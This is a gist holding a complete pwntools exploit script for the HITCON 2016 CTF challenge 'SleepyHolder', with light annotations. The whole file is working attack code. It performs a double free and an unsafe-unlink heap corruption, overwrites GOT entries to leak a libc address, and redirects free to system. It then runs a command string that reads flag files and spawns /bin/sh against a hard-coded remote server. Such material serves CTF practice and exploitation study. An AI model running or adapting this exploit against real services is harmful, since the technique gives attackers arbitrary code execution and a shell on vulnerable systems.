@andigena
Created October 10, 2016 02:27
import os

# TERM is set before pwntools is imported; presumably so its terminal
# handling picks the value up at import time -- confirm if it is changed.
os.environ['TERM'] = 'xterm-256color'
from pwn import *

context.update(arch='amd64')

# Paths to the challenge directory, the target binary and the libc whose
# symbol offsets are used later to rebase a leaked pointer.
cwd = '/media/SSD2/dev/hx/ctf/hitcon16/sleepy'
bin = os.path.join(cwd, 'SleepyHolder')  # NOTE: shadows the builtin bin()
b = ELF(bin)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Backend used by conn(): 'gdb', 'qira', 'naked' or 'live'.
TARGET = 'live'

# Addresses to break on for the 'gdb' backend (0x400E95 was used at some
# point and is left here as a reminder).
breakpoints = []

# gdb commands handed to gdb.attach(): one 'b *<addr>' per breakpoint, then
# resume.  Earlier runs also set malloc.c source breakpoints here.
execute = []
for br in breakpoints:
    execute.append('b *' + hex(br))
execute.append('continue')
execute = flat([cmd + '\n' for cmd in execute])

# Value written to /tmp/urandom by conn() for the 'gdb' backend.
urandom = 0x1000 - 0x20 - 8
print execute
def conn():
    """Open a tube to the target chosen by the module-level TARGET.

    'gdb'   - local process with ASLR off, LD_PRELOAD of preeny's dealarm.so
              (presumably to neutralise the service's alarm(); confirm) and
              gdb attached with the `execute` command string.  /tmp/urandom
              is first populated with p32(urandom).
    'qira'  - a qira instance already listening locally on port 4000.
    'naked' - a plain local instance on port 24242.
    anything else - the live remote service.

    Returns the pwntools tube.
    """
    if TARGET == 'gdb':
        with open('/tmp/urandom', 'wb') as ur:
            ur.write(p32(urandom))
        env = dict(os.environ)
        env['LD_PRELOAD'] = '/media/SSD2/virtual/shared/shit/preeny/x86_64-linux-gnu/dealarm.so'
        tube = process(bin, cwd=cwd, env=env, aslr=False)
        gdb.attach(tube, execute=execute)
        return tube
    if TARGET == 'qira':
        # Start with
        # stdbuf -oO qira -s ./books_757b0a24b0193ec8989290ec6923dd1d
        return remote('127.0.0.1', 4000)
    if TARGET == 'naked':
        return remote('localhost', 24242)
    return remote('52.68.31.117', 9547)
# Menu choice sent for each secret size.
t = dict(small='1', big='2', huge='3')
def wipe(which):
    """Select menu option 2 and delete the secret named by `which`.

    `which` is one of the keys of the module-level `t` ('small', 'big',
    'huge'); `p` is the module-level tube.
    """
    choice = t[which]
    p.sendlineafter('Renew secret\n', '2')
    p.sendlineafter('Big secret\n', choice)
# for the first time
def keep(which, what):
    """Create the secret `which` with contents `what` (menu option 1).

    Waits for the 'forever' prompt the service shows the first time, and
    sends `what` followed by a newline; compare keep2().
    """
    choice = t[which]
    p.sendlineafter('Renew secret\n', '1')
    p.sendlineafter('forever\n', choice)
    p.sendlineafter(': \n', what)
# for later calls (the service uses a different prompt by then)
def keep2(which, what):
    """Create the secret `which` with contents `what` (menu option 1).

    Variant of keep() for later calls: waits for the 'Big secret' prompt
    and sends `what` as-is, without a trailing newline.
    """
    choice = t[which]
    p.sendlineafter('Renew secret\n', '1')
    p.sendlineafter('Big secret\n', choice)
    p.sendafter(': \n', what)
def renew(which, what):
    """Overwrite the secret `which` with `what` (menu option 3).

    Prints the data received up to the first prompt (debug output) and
    sends `what` with a trailing newline; compare renew2().
    """
    choice = t[which]
    received = p.sendlineafter('Renew secret\n', '3')
    print received
    p.sendlineafter('Big secret\n', choice)
    p.sendlineafter(': \n', what)
def renew2(which, what):
    """Overwrite the secret `which` with `what` (menu option 3).

    Sends `what` as-is, without a trailing newline, so raw 8-byte values
    from p64() are delivered exactly.
    """
    choice = t[which]
    p.sendlineafter('Renew secret\n', '3')
    p.sendlineafter('Big secret\n', choice)
    p.sendafter(': \n', what)
p = conn()
# Two allocations, then the small secret is freed twice around a third
# allocation (the helper functions above drive the service's menu).
keep('small', cyclic(8))
keep('big', cyclic(8, alphabet=string.ascii_uppercase))
wipe('small')
# pause()
keep('huge', cyclic(3, alphabet=string.ascii_uppercase))
wipe('small')
# Fixed address in the binary's data segment, presumably the global that
# stores the small-secret pointer -- verify against the binary.  The whole
# script depends on such hard-coded addresses, i.e. on the binary not
# being position independent.
small_holder = 0x06020D0
# Bytes written into the small secret, laid out by fit(): 0x21 at +8 and
# two pointers just below small_holder at +16/+24.
pl = {
0: 0x0,
8: 0x21,
16: small_holder-24,
24: small_holder-16,
32: 0x20
}
keep2('small', fit(pl))
# corrupt small->fd through prev_unlink of big
wipe('big')
# From here on, renew2('small', ...) chooses which address the big secret
# aliases; the GOT entries used below must be writable for this to work
# (a full-RELRO build would stop it).
renew2('small', cyclic(8) + p64(b.got['free']) + p64(0) + p64(0x06020C0) + p64(0xffffffffffffffff))
# Unused; left over from the commented-out variant a few lines below.
system_local = 0x8380
# free@got -> puts@plt, then point the small secret at read@got so the
# next wipe prints the resolved read() address.
renew2('big', p64(b.plt['puts']))
# renew2('big', p64(libc.symbols['system'])[:2])
renew2('small', p64(b.got['read']))
wipe('big')
resp = p.recvuntil('1.')
read = u64(resp.split()[0].ljust(8, '\0'))
print hex(read)
# Rebase the local libc copy from the leak.  This is only meaningful if the
# remote libc matches /lib/x86_64-linux-gnu/libc.so.6 loaded at the top.
# NOTE(review): this looks like a plain attribute assignment rather than
# pwntools' rebasing `address` setter -- the explicit `libc.base + ...`
# below suggests symbols stay unrebased offsets; confirm for the pwntools
# version in use.
libc.base = read - libc.symbols['read']
print 'libc.base: ', hex(libc.base)
keep2('big', 'echo OK GOOGLE; cat fl*; cat home/*/fl*; /bin/sh\0')
pause()
# Point the big secret at free@got again and replace it with system, so
# that the following wipe('big') runs the command string stored above.
renew2('small', p64(b.got['free']))
print 'using ', hex(libc.symbols['system'])  # prints the offset, not the rebased address (see note above)
pause()
renew2('big', p64(libc.base + libc.symbols['system']))
wipe('big')
# Second round with the same command string.
keep2('big', 'echo OK GOOGLE; cat fl*; cat home/*/fl*; /bin/sh\0')
wipe('big')
p.interactive()